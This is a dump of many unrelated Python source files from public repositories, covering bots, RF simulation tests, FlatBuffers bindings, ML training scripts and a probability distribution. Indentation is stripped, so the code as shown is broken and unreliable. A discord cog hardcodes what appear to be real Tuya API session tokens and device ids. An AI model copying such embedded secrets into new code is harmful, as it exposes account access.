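# The exact keys beyond SQLALCHEMY_DATABASE_URI depend on the deployment.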
|
test/plugins/echo.py | fenwar/limbo | 369 | 12745396 | def on_message_deleted(msg, server):
return "Deleted: {}".format(msg["previous_message"]["text"])
def on_message_changed(msg, server):
text = msg.get("message", {"text": ""}).get("text", "")
if text.startswith("!echo"):
return "Changed: {}".format(text)
def on_message(msg, server):
if msg["text"].startswith("!echo"):
return msg.get("text", "")
def on_channel_join(msg, server):
return "saw user {} join".format(msg['user'])
|
imagepy/tools/Measure/coordinate_tol.py | dada1437903138/imagepy | 1,178 | 12745425 | from sciapp.action import CoordinateTool as Plugin |
ppgan/faceutils/image.py | pcwuyu/PaddleGAN | 6,852 | 12745431 | <reponame>pcwuyu/PaddleGAN
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import cv2
from io import BytesIO
def resize_by_max(image, max_side=512, force=False):
h, w = image.shape[:2]
if max(h, w) < max_side and not force:
return image
ratio = max(h, w) / max_side
w = int(w / ratio + 0.5)
h = int(h / ratio + 0.5)
return cv2.resize(image, (w, h))
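# Example (illustrative): a 1024x768 input (h=768, w=1024) gives ratio 2, so the
# image is resized to 512x384; inputs whose longer side is already below
# max_side are returned unchanged unless force=True.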
|
examples/apidemos-preference-advanced_preferences.py | tqchagas/AndroidViewClient | 1,155 | 12745436 | <filename>examples/apidemos-preference-advanced_preferences.py
#! /usr/bin/env python
'''
Copyright (C) 2012 <NAME>
Created on Sep 18, 2012
@author: diego
'''
import re
import sys
import os
try:
sys.path.append(os.path.join(os.environ['ANDROID_VIEW_CLIENT_HOME'], 'src'))
except:
pass
import com.dtmilano.android.viewclient as viewclient
if viewclient.__version__ < '1.0':
print >> sys.stderr, "%s: This script requires viewclient 1.0 or greater." % os.path.basename(sys.argv[0])
sys.exit(1)
device, serialno = viewclient.ViewClient.connectToDeviceOrExit()
FLAG_ACTIVITY_NEW_TASK = 0x10000000
#09-06 01:01:34.964: I/ActivityManager(873): START {act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x10200000 cmp=com.example.android.apis/.ApiDemos bnds=[784,346][880,442]} from pid 991
componentName = 'com.example.android.apis/.ApiDemos'
device.startActivity(component=componentName, flags=FLAG_ACTIVITY_NEW_TASK)
viewclient.ViewClient.sleep(3)
vc = viewclient.ViewClient(device=device, serialno=serialno)
vc.findViewWithTextOrRaise('Preference').touch()
vc.dump()
vc.findViewWithTextOrRaise(re.compile('.*Advanced preferences')).touch()
vc.dump()
myPreference = vc.findViewWithTextOrRaise('My preference')
if vc.getSdkVersion() >= 16:
_id = 'id/no_id/22'
else:
_id = 'id/mypreference_widget'
value0 = vc.findViewByIdOrRaise(_id).getText()
for i in range(10):
myPreference.touch()
vc.dump()
value1 = vc.findViewByIdOrRaise(_id).getText()
print "My preference started with value %s and is now %s" % (value0, value1)
|
python/cogs/extra/lamp.py | dev-null-undefined/felix | 135 | 12745461 | """This is a cog for a discord.py bot.
It adds Lamp
"""
from discord.ext import commands
class Lamp(commands.Cog, command_attrs=dict(hidden=True)):
def __init__(self, client):
self.client = client
@commands.group(
name='lamp',
hidden=True,
invoke_without_command=True,
)
async def lamp(self, ctx):
"""Commands to control the live stream integration"""
await ctx.send_help('lamp')
@lamp.command(
name='off',
)
async def lamp_off(self, ctx):
url = 'https://a1.tuyaus.com/api.json?appVersion=3.13.0&appRnVersion=5.18&channel=oem&sign=47e07d9cf53bbab369fc504760c8d3752f0f7c2f8a56fe8c63f28c99d7bb8e1c&platform=ONEPLUS%20A5000&requestId=7c696d1e-8579-4871-b271-71b6a3a093d5&lang=en&a=tuya.m.device.dp.publish&clientId=ekmnwp9f5pnh3trdtpgy&osSystem=9&os=Android&timeZoneId=America%2FChicago&ttid=sdk_tuya%40ekmnwp9f5pnh3trdtpgy&et=0.0.1&v=1.0&sdkVersion=3.13.0&time=1572717891'
headers = {
'User-Agent':'TY-UA=APP/Android/3.13.0/SDK/3.13.0',
'Content-Type':'application/x-www-form-urlencoded',
'Content-Length':'260',
'Host':'a1.tuyaus.com',
'Connection':'Keep-Alive',
'Accept-Encoding':'gzip',
}
data = {
'postData':'{"devId":"06200623b4e62d1a196d","dps":"{\\"1\\":false}","gwId":"06200623b4e62d1a196d"}',
'deviceId':'0cbe6a9f082da9d8ad9607677542561f46adb4592222',
'sid':'az152789n0645407g6y4cy235e9cec2811a8b93caefedeea3c2ce5a8',
}
async with self.client.session.post(url, headers=headers, data=data) as response:
res = await response.json()
print(res)
if res['status'] == 'ok':
await ctx.send('Success')
@lamp.command(
name='on',
)
async def lamp_on(self, ctx):
print('on')
url = 'https://a1.tuyaus.com/api.json?appVersion=3.13.0&appRnVersion=5.18&channel=oem&sign=a8a0a9914c77dc5d01f2826a2588bb25151a1d9b46688223b10586a3fc56a4c7&platform=ONEPLUS%20A5000&requestId=3a891769-255a-4a55-971a-551df700252f&lang=en&a=tuya.m.device.dp.publish&clientId=ekmnwp9f5pnh3trdtpgy&osSystem=9&os=Android&timeZoneId=America%2FChicago&ttid=sdk_tuya%40ekmnwp9f5pnh3trdtpgy&et=0.0.1&v=1.0&sdkVersion=3.13.0&time=1572717894'
headers = {
'User-Agent':'TY-UA=APP/Android/3.13.0/SDK/3.13.0',
'Content-Type':'application/x-www-form-urlencoded',
'Content-Length':'259',
'Host':'a1.tuyaus.com',
'Connection':'Keep-Alive',
'Accept-Encoding':'gzip',
}
data = {
'postData':'{"devId":"06200623b4e62d1a196d","dps":"{\\"1\\":true}","gwId":"06200623b4e62d1a196d"}',
'deviceId':'0cbe6a9f082da9d8ad9607677542561f46adb4592222',
'sid':'az152789n0645407g6y4cy235e9cec2811a8b93caefedeea3c2ce5a8',
}
print('sending')
async with self.client.session.post(url, headers=headers, data=data) as response:
res = await response.json()
print(res)
if res['status'] == 'ok':
await ctx.send('Success')
def setup(client):
"""This is called when the cog is loaded via load_extension"""
client.add_cog(Lamp(client))
|
skrf/media/tests/test_media.py | dxxx9/scikit-rf | 379 | 12745482 | <reponame>dxxx9/scikit-rf
# -*- coding: utf-8 -*-
import unittest
import os
import numpy as npy
from skrf.media import DefinedGammaZ0, Media
from skrf.network import Network
from skrf.frequency import Frequency
import skrf
class DefinedGammaZ0TestCase(unittest.TestCase):
def setUp(self):
self.files_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'qucs_prj'
)
self.dummy_media = DefinedGammaZ0(
frequency = Frequency(1,100,21,'ghz'),
gamma=1j,
z0 = 50 ,
)
def test_impedance_mismatch(self):
"""
"""
fname = os.path.join(self.files_dir,\
'impedanceMismatch,50to25.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.thru(z0=50)**\
self.dummy_media.thru(z0=25)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_resistor(self):
"""
"""
fname = os.path.join(self.files_dir,\
'resistor,1ohm.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.resistor(1)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_capacitor(self):
"""
"""
fname = os.path.join(self.files_dir,\
'capacitor,p01pF.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.capacitor(.01e-12)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_inductor(self):
"""
"""
fname = os.path.join(self.files_dir,\
'inductor,p1nH.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.inductor(.1e-9)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_scalar_gamma_z0_media(self):
"""
test ability to create a Media from scalar quantities for gamma/z0
and change frequency resolution
"""
        a = DefinedGammaZ0(Frequency(1, 10, 101), gamma=1j, z0=50)
self.assertEqual(a.line(1),a.line(1))
# we should be able to re-sample the media
a.npoints = 21
self.assertEqual(len(a.gamma), len(a))
self.assertEqual(len(a.z0), len(a))
self.assertEqual(len(a.z0), len(a))
def test_vector_gamma_z0_media(self):
"""
test ability to create a Media from vector quantities for gamma/z0
"""
freq = Frequency(1,10,101)
a = DefinedGammaZ0(freq,
gamma = 1j*npy.ones(len(freq)) ,
z0 = 50*npy.ones(len(freq)),
)
self.assertEqual(a.line(1),a.line(1))
with self.assertRaises(NotImplementedError):
a.npoints=4
def test_write_csv(self):
fname = os.path.join(self.files_dir,\
'out.csv')
self.dummy_media.write_csv(fname)
os.remove(fname)
def test_from_csv(self):
fname = os.path.join(self.files_dir,\
'out.csv')
self.dummy_media.write_csv(fname)
a_media = DefinedGammaZ0.from_csv(fname)
self.assertEqual(a_media,self.dummy_media)
os.remove(fname)
class STwoPortsNetworkTestCase(unittest.TestCase):
"""
Check that S parameters of media base elements versus theoretical results.
"""
def setUp(self):
self.dummy_media = DefinedGammaZ0(
frequency=Frequency(1, 100, 21, 'GHz'),
gamma=1j,
z0=50,
)
def test_s_series_element(self):
"""
Series elements of impedance Z:
○---[Z]---○
○---------○
have S matrix of the form:
[ Z/Z0 / (Z/Z0 + 2) 2/(Z/Z0 + 2) ]
[ 2/(Z/Z0 + 2) Z/Z0 / (Z/Z0 + 2) ]
"""
R = 1.0 # Ohm
ntw = self.dummy_media.resistor(R)
Z0 = self.dummy_media.z0
S11 = (R/Z0) / (R/Z0 + 2)
S21 = 2 / (R/Z0 + 2)
npy.testing.assert_array_almost_equal(ntw.s[:,0,0], S11)
npy.testing.assert_array_almost_equal(ntw.s[:,0,1], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,0], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,1], S11)
def test_s_shunt_element(self):
"""
Shunt elements of admittance Y:
○---------○
|
[Y]
|
○---------○
have S matrix of the form:
[ -Y Z0 / (Y Z0 + 2) 2/(Y Z0 + 2) ]
        [ 2/(Y Z0 + 2) -Y Z0 / (Y Z0 + 2) ]
"""
R = 1.0 # Ohm
ntw = self.dummy_media.shunt(self.dummy_media.resistor(R)**self.dummy_media.short())
Z0 = self.dummy_media.z0
S11 = -(1/R*Z0) / (1/R*Z0 + 2)
S21 = 2 / (1/R*Z0 + 2)
npy.testing.assert_array_almost_equal(ntw.s[:,0,0], S11)
npy.testing.assert_array_almost_equal(ntw.s[:,0,1], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,0], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,1], S11)
def test_s_lossless_line(self):
"""
Lossless transmission line of characteristic impedance z1, length l
and wavenumber beta
_______
○----- -----○
z0 z1 z0
○-----_______-----○
"""
l = 5.0
z1 = 30.0
z0 = self.dummy_media.z0
ntw = self.dummy_media.line(d=0, unit='m', z0=z0) \
** self.dummy_media.line(d=l, unit='m', z0=z1) \
** self.dummy_media.line(d=0, unit='m', z0=z0)
beta = self.dummy_media.beta
_z1 = z1/z0
S11 = 1j*(_z1**2 - 1)*npy.sin(beta*l) / \
(2*_z1*npy.cos(beta*l) + 1j*(_z1**2 + 1)*npy.sin(beta*l))
S21 = 2*_z1 / \
(2*_z1*npy.cos(beta*l) + 1j*(_z1**2 + 1)*npy.sin(beta*l))
npy.testing.assert_array_almost_equal(ntw.s[:,0,0], S11)
npy.testing.assert_array_almost_equal(ntw.s[:,0,1], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,0], S21)
npy.testing.assert_array_almost_equal(ntw.s[:,1,1], S11)
def test_s_lossy_line(self):
"""
Lossy transmission line of characteristic impedance Z0, length l
and propagation constant gamma = alpha + j beta
○---------○
○---------○
has ABCD matrix of the form:
[ cosh(gamma l) Z0 sinh(gamma l) ]
[ 1/Z0 sinh(gamma l) cosh(gamma l) ]
"""
class ABCDTwoPortsNetworkTestCase(unittest.TestCase):
"""
Check that ABCD parameters of media base elements (such as lumped elements)
versus theoretical results.
"""
def setUp(self):
self.dummy_media = DefinedGammaZ0(
frequency=Frequency(1, 100, 21,'GHz'),
gamma=1j,
z0=50 ,
)
def test_abcd_series_element(self):
"""
Series elements of impedance Z:
○---[Z]---○
○---------○
have ABCD matrix of the form:
[ 1 Z ]
[ 0 1 ]
"""
R = 1.0 # Ohm
ntw = self.dummy_media.resistor(R)
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], 1.0)
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], R)
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 0.0)
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], 1.0)
def test_abcd_shunt_element(self):
"""
Shunt elements of admittance Y:
○---------○
|
[Y]
|
○---------○
have ABCD matrix of the form:
[ 1 0 ]
[ Y 1 ]
"""
R = 1.0 # Ohm
ntw = self.dummy_media.shunt(self.dummy_media.resistor(R)**self.dummy_media.short())
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], 1.0)
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], 0.0)
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 1.0/R)
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], 1.0)
def test_abcd_series_shunt_elements(self):
"""
Series and Shunt elements of impedance Zs and Zp:
○---[Zs]--------○
|
[Zp]
|
○--------------○
have ABCD matrix of the form:
[ 1 + Zs/Zp Zs ]
[ 1/Zp 1 ]
"""
Rs = 2.0
Rp = 3.0
serie_resistor = self.dummy_media.resistor(Rs)
shunt_resistor = self.dummy_media.shunt(self.dummy_media.resistor(Rp) ** self.dummy_media.short())
ntw = serie_resistor ** shunt_resistor
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], 1.0+Rs/Rp)
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], Rs)
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 1.0/Rp)
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], 1.0)
def test_abcd_thru(self):
"""
Thru has ABCD matrix of the form:
[ 1 0 ]
[ 0 1 ]
"""
ntw = self.dummy_media.thru()
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], 1.0)
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], 0.0)
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 0.0)
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], 1.0)
def test_abcd_lossless_line(self):
"""
Lossless transmission line of characteristic impedance Z0, length l
and wavenumber beta
○---------○
○---------○
has ABCD matrix of the form:
[ cos(beta l) j Z0 sin(beta l) ]
[ j/Z0 sin(beta l) cos(beta l) ]
"""
l = 5
z0 = 80
ntw = self.dummy_media.line(d=l, unit='m', z0=z0)
beta = self.dummy_media.beta
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], npy.cos(beta*l))
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], 1j*z0*npy.sin(beta*l))
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 1j/z0*npy.sin(beta*l))
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], npy.cos(beta*l))
def test_abcd_lossy_line(self):
"""
Lossy transmission line of characteristic impedance Z0, length l
and propagation constant gamma = alpha + j beta
○---------○
○---------○
has ABCD matrix of the form:
[ cosh(gamma l) Z0 sinh(gamma l) ]
[ 1/Z0 sinh(gamma l) cosh(gamma l) ]
"""
l = 5.0
z0 = 30.0
alpha = 0.5
beta = 2.0
lossy_media = DefinedGammaZ0(
frequency=Frequency(1, 100, 21, 'GHz'),
gamma=alpha + 1j*beta,
z0=z0
)
ntw = lossy_media.line(d=l, unit='m', z0=z0)
gamma = lossy_media.gamma
npy.testing.assert_array_almost_equal(ntw.a[:,0,0], npy.cosh(gamma*l))
npy.testing.assert_array_almost_equal(ntw.a[:,0,1], z0*npy.sinh(gamma*l))
npy.testing.assert_array_almost_equal(ntw.a[:,1,0], 1.0/z0*npy.sinh(gamma*l))
npy.testing.assert_array_almost_equal(ntw.a[:,1,1], npy.cosh(gamma*l))
|
docs/docs_env/Lib/site-packages/pip-1.0-py2.5.egg/pip/runner.py | gilsonbp/Django-facebook | 10,056 | 12745543 | import sys
import os
def run():
base = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
## FIXME: this is kind of crude; if we could create a fake pip
## module, then exec into it and update pip.__path__ properly, we
## wouldn't have to update sys.path:
sys.path.insert(0, base)
import pip
return pip.main()
if __name__ == '__main__':
exit = run()
if exit:
sys.exit(exit)
|
datalad/downloaders/tests/utils.py | ypid/datalad | 298 | 12745552 | # emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Downloader tests helper utils"""
from unittest import SkipTest
from datalad.downloaders.providers import Providers
def get_test_providers(url=None, reload=False):
"""Return reusable instance of our global providers + verify credentials for url"""
_test_providers = Providers.from_config_files(reload=reload)
if url is not None:
# check if we have credentials for the url
provider = _test_providers.get_provider(url, only_nondefault=True)
if provider is None or provider.credential is None:
# no registered provider, or no credential needed,must be all kosher to access
pass
elif not provider.credential.is_known:
raise SkipTest("This test requires known credentials for %s" % provider.credential.name)
return _test_providers
get_test_providers.__test__ = False
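# Usage sketch (illustrative; the URL is a hypothetical placeholder): a download
# test would typically call
#     providers = get_test_providers('https://example.com/some/file')
# which raises SkipTest when the matching provider needs credentials that are
# not known in the local configuration.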
|
service/generated_flatbuffers/tflite/TensorMap.py | lcrh/falken | 213 | 12745604 | <gh_stars>100-1000
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: tflite
import flatbuffers
from flatbuffers.compat import import_numpy
np = import_numpy()
class TensorMap(object):
__slots__ = ['_tab']
@classmethod
def GetRootAsTensorMap(cls, buf, offset):
n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset)
x = TensorMap()
x.Init(buf, n + offset)
return x
@classmethod
def TensorMapBufferHasIdentifier(cls, buf, offset, size_prefixed=False):
return flatbuffers.util.BufferHasIdentifier(buf, offset, b"\x54\x46\x4C\x33", size_prefixed=size_prefixed)
# TensorMap
def Init(self, buf, pos):
self._tab = flatbuffers.table.Table(buf, pos)
# TensorMap
def Name(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4))
if o != 0:
return self._tab.String(o + self._tab.Pos)
return None
# TensorMap
def TensorIndex(self):
o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6))
if o != 0:
return self._tab.Get(flatbuffers.number_types.Uint32Flags, o + self._tab.Pos)
return 0
def TensorMapStart(builder): builder.StartObject(2)
def TensorMapAddName(builder, name): builder.PrependUOffsetTRelativeSlot(0, flatbuffers.number_types.UOffsetTFlags.py_type(name), 0)
def TensorMapAddTensorIndex(builder, tensorIndex): builder.PrependUint32Slot(1, tensorIndex, 0)
def TensorMapEnd(builder): return builder.EndObject()
class TensorMapT(object):
# TensorMapT
def __init__(self):
self.name = None # type: str
self.tensorIndex = 0 # type: int
@classmethod
def InitFromBuf(cls, buf, pos):
tensorMap = TensorMap()
tensorMap.Init(buf, pos)
return cls.InitFromObj(tensorMap)
@classmethod
def InitFromObj(cls, tensorMap):
x = TensorMapT()
x._UnPack(tensorMap)
return x
# TensorMapT
def _UnPack(self, tensorMap):
if tensorMap is None:
return
self.name = tensorMap.Name()
self.tensorIndex = tensorMap.TensorIndex()
# TensorMapT
def Pack(self, builder):
if self.name is not None:
name = builder.CreateString(self.name)
TensorMapStart(builder)
if self.name is not None:
TensorMapAddName(builder, name)
TensorMapAddTensorIndex(builder, self.tensorIndex)
tensorMap = TensorMapEnd(builder)
return tensorMap
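# Serialization sketch (illustrative, not part of the generated file): building
# a TensorMap buffer with the functional builder API above, using the standard
# flatbuffers.Builder from the FlatBuffers runtime.
#
#     import flatbuffers
#     builder = flatbuffers.Builder(0)
#     name = builder.CreateString("input_0")
#     TensorMapStart(builder)
#     TensorMapAddName(builder, name)
#     TensorMapAddTensorIndex(builder, 3)
#     builder.Finish(TensorMapEnd(builder))
#     buf = builder.Output()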
|
conftest.py | aperrin66/DAPPER | 225 | 12745621 | """Configures pytest (beyond the ini file)."""
import matplotlib as mpl
import numpy
import pytest
from matplotlib import pyplot as plt
from dapper.dpr_config import rc
@pytest.fixture(autouse=True)
def add_sci(doctest_namespace):
"""Add numpy as np for doctests."""
doctest_namespace["np"] = numpy
doctest_namespace["mpl"] = mpl
doctest_namespace["plt"] = plt
doctest_namespace["rnd"] = numpy.random
doctest_namespace["rc"] = rc
|
demo/memory_tree/xml_amazoncat_13K_script.py | Ark-kun/vowpal_wabbit | 4,332 | 12745624 | import os
import time
import numpy as np
# from IPython import embed
print("perform experiments on amazoncat 13K (multilabel)")
leaf_example_multiplier = 2
lr = 1
bits = 30
alpha = 0.1 # 0.3
passes = 4
learn_at_leaf = True
use_oas = True
# num_queries = 1 #does not really use
dream_at_update = 1
# hal_version = 1 #does not really use
loss = "squared"
dream_repeats = 3
# Precision_at_K = 5
num_examples = 1186239
max_num_labels = 13330
tree_node = int(
num_examples / (np.log(num_examples) / np.log(2) * leaf_example_multiplier)
)
train_data = "amazoncat_train.mat.mult_label.vw.txt"
test_data = "amazoncat_test.mat.mult_label.vw.txt"
if os.path.exists(train_data) is not True:
os.system("wget http://kalman.ml.cmu.edu/wen_datasets/{}".format(train_data))
if os.path.exists(test_data) is not True:
os.system("wget http://kalman.ml.cmu.edu/wen_datasets/{}".format(test_data))
saved_model = "{}.vw".format(train_data)
print("## Training...")
start = time.time()
# train_data = 'tmp_rcv1x.vw.txt'
command_line = f"../../build/vowpalwabbit/vw -d {train_data} --memory_tree {tree_node} {'--learn_at_leaf' if learn_at_leaf else ''} --dream_at_update {dream_at_update}\
--max_number_of_labels {max_num_labels} --dream_repeats {dream_repeats} {'--oas' if use_oas else ''} \
--leaf_example_multiplier {leaf_example_multiplier} --alpha {alpha} -l {lr} -b {bits} -c --passes {passes} --loss_function {loss} --holdout_off -f {saved_model}"
os.system(command_line)
train_time = time.time() - start
print("## Testing...")
start = time.time()
os.system(
"../../build/vowpalwabbit/vw {} --oas {} -i {}".format(
test_data, use_oas, saved_model
)
)
test_time = time.time() - start
print("## train time {}, and test time {}".format(train_time, test_time))
|
Contrastive_Supervision_Synthesis/scripts/model.py | vishalbelsare/OpenMatch | 403 | 12745700 | import os
import math
import torch
from torch import nn, optim
import logging
import numpy as np
import torch.nn.functional as F
from torch.autograd import Variable
import utils
from contrastqg import (T5ForConditionalGeneration)
logger = logging.getLogger()
class QGenerator(object):
def __init__(self, args, tokenizer):
self.network = T5ForConditionalGeneration.from_pretrained(args.pretrain_generator_type)
self.network.resize_token_embeddings(len(tokenizer))
self.network.load_state_dict(torch.load(args.generator_load_dir + '/models.pkl'))
logger.info("sccuess load checkpoint from {} !".format(args.generator_load_dir))
self.tokenizer = tokenizer
self.batchify_inputs = utils.select_gen_input_refactor(args)
def predict(self, inputs):
self.network.eval()
outputs = self.network.generate(**inputs)
pred_tokens = self.tokenizer.convert_outputs_to_tokens(outputs)
return pred_tokens
def set_device(self, device):
self.device = device
self.network.to(self.device)
def parallelize(self):
"""Use data parallel to copy the model across several gpus.
This will take all gpus visible with CUDA_VISIBLE_DEVICES.
"""
self.parallel = True
self.network = torch.nn.DataParallel(self.network) |
chaospy/distributions/collection/bradford.py | utsekaj42/chaospy | 333 | 12745714 | <reponame>utsekaj42/chaospy
"""Bradford distribution."""
import numpy
from ..baseclass import SimpleDistribution, LowerUpperDistribution
class bradford(SimpleDistribution):
"""Standard Bradford distribution."""
def __init__(self, c=1):
super(bradford, self).__init__(dict(c=c))
def _pdf(self, x, c):
return c/(c*x+1.)/numpy.log(1.+c)
def _cdf(self, x, c):
return numpy.log(1.+c*x)/numpy.log(c+1.)
def _ppf(self, q, c):
return ((1.+c)**q-1)/c
def _lower(self, c):
return 0.
def _upper(self, c):
return 1.
class Bradford(LowerUpperDistribution):
"""
Bradford distribution.
Args:
shape (float, Distribution):
Shape parameter
lower (float, Distribution):
Location of lower threshold
upper (float, Distribution):
Location of upper threshold
Examples:
>>> distribution = chaospy.Bradford(0.8, 4, 6)
>>> distribution
Bradford(0.8, lower=4, upper=6)
>>> uloc = numpy.linspace(0, 1, 6)
>>> uloc
array([0. , 0.2, 0.4, 0.6, 0.8, 1. ])
>>> xloc = distribution.inv(uloc)
>>> xloc.round(3)
array([4. , 4.312, 4.663, 5.057, 5.501, 6. ])
>>> numpy.allclose(distribution.fwd(xloc), uloc)
True
>>> distribution.pdf(xloc).round(3)
array([0.681, 0.605, 0.538, 0.478, 0.425, 0.378])
>>> distribution.sample(4).round(3)
array([5.171, 4.175, 5.87 , 4.819])
"""
def __init__(self, shape=1, lower=0, upper=1):
super(Bradford, self).__init__(
dist=bradford(shape),
lower=lower,
upper=upper,
repr_args=[shape],
)
|
axcell/models/structure/transfo_experiment.py | Kabongosalomon/axcell | 335 | 12745718 | <reponame>Kabongosalomon/axcell<filename>axcell/models/structure/transfo_experiment.py<gh_stars>100-1000
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import time
from .experiment import Experiment
from .nbsvm import preds_for_cell_content, preds_for_cell_content_max, preds_for_cell_content_multi
import dataclasses
from dataclasses import dataclass
from typing import Tuple
from axcell.helpers.training import set_seed
from fastai.text import *
import numpy as np
from pathlib import Path
import json
import argparse
import glob
import logging
import os
import random
import numpy as np
import torch
from torch.utils.data import (DataLoader, RandomSampler, SequentialSampler,
TensorDataset)
from torch.utils.data.distributed import DistributedSampler
from fastai.text import * # for utilty functions
try:
from torch.utils.tensorboard import SummaryWriter
except:
from tensorboardX import SummaryWriter
from tqdm import tqdm, trange
import tensorflow_datasets
from transformers import (WEIGHTS_NAME, BertConfig,
BertForSequenceClassification, BertTokenizer,
RobertaConfig,
RobertaForSequenceClassification,
RobertaTokenizer,
XLMConfig, XLMForSequenceClassification,
XLMTokenizer, XLNetConfig,
XLNetForSequenceClassification,
XLNetTokenizer,
DistilBertConfig,
DistilBertForSequenceClassification,
DistilBertTokenizer, DataProcessor, InputExample, AutoConfig)
from transformers import AdamW, WarmupLinearSchedule
from transformers import glue_compute_metrics as compute_metrics
from transformers import glue_output_modes as output_modes
from transformers import glue_processors as processors
from transformers import glue_convert_examples_to_features as convert_examples_to_features
from transformers import AutoTokenizer, AutoModelForSequenceClassification, glue_convert_examples_to_features
from transformers.data.processors.glue import glue_processors
logger = logging.getLogger(__name__)
def train(args, train_dataset, valid_dataset, model, tokenizer):
""" Train the model """
if args.local_rank in [-1, 0]:
tb_writer = args.get_summary_writer()
train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(train_dataset)
train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size)
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = args.max_steps // (len(train_dataloader) // args.gradient_accumulation_steps) + 1
else:
t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs
# Prepare optimizer and schedule (linear warmup and decay)
no_decay = ['bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)], 'weight_decay': args.weight_decay},
{'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args.warmup_steps, t_total=t_total)
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
model, optimizer = amp.initialize(model, optimizer, opt_level=args.fp16_opt_level)
# multi-gpu training (should be after apex fp16 initialization)
if args.n_gpu > 1:
model = torch.nn.DataParallel(model)
# Distributed training (should be after apex fp16 initialization)
if args.local_rank != -1:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.local_rank],
output_device=args.local_rank,
find_unused_parameters=True)
# Train!
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(" Instantaneous batch size per GPU = %d", args.per_gpu_train_batch_size)
logger.info(" Total train batch size (w. parallel, distributed & accumulation) = %d",
args.train_batch_size * args.gradient_accumulation_steps * (torch.distributed.get_world_size() if args.local_rank != -1 else 1))
logger.info(" Gradient Accumulation steps = %d", args.gradient_accumulation_steps)
logger.info(" Total optimization steps = %d", t_total)
global_step = 0
tr_loss, logging_loss = 0.0, 0.0
model.zero_grad()
train_iterator = range(int(args.num_train_epochs))
set_seed(args.seed, "Training", all_gpus=(args.n_gpu > 1)) # Added here for reproductibility (even between python 2 and 3)
mb = master_bar(train_iterator)
mb.first_bar.comment = f'Epochs'
results={}
for epoch in mb:
